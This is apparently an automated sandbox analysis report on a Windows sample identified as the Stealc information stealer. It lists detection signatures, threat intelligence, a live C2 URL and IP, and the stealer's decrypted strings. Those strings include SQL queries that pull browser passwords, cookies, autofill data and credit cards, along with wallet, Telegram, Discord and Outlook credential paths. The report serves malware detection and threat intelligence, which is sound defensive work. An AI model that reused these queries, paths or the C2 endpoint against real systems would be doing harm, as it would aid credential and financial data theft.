Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545825
MD5:1bd30bb80448545cc020f946eda1d2f2
SHA1:fdf3333834e0a0d4f2d1ed90c8179a2f76d6d512
SHA256:0eab0f6617a84d6ffdc802b19a9502e7910aace80478d15360685830c84e324e
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1BD30BB80448545CC020F946EDA1D2F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5024JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5024JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ac0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T05:06:59.243278+010020442431Malware Command and Control Activity Detected192.168.2.649707185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.ac0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206/Virustotal: Detection: 18%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeVirustotal: Detection: 39%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: history
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: History
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: open
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: files
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.ac0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
